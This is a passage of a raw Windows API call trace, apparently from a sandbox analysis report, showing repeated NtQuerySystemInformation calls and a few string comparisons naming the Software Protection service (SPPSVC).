[0206.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x28, ResultLength=0x0) [0206.939] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x28, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x28, ResultLength=0x0) [0206.952] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x28, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x28, ResultLength=0x0) [0206.966] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x28, ResultLength=0x0) [0206.966] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x28, ResultLength=0x0) [0206.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x28, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x28, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x20, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x20, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x20, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x20, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] 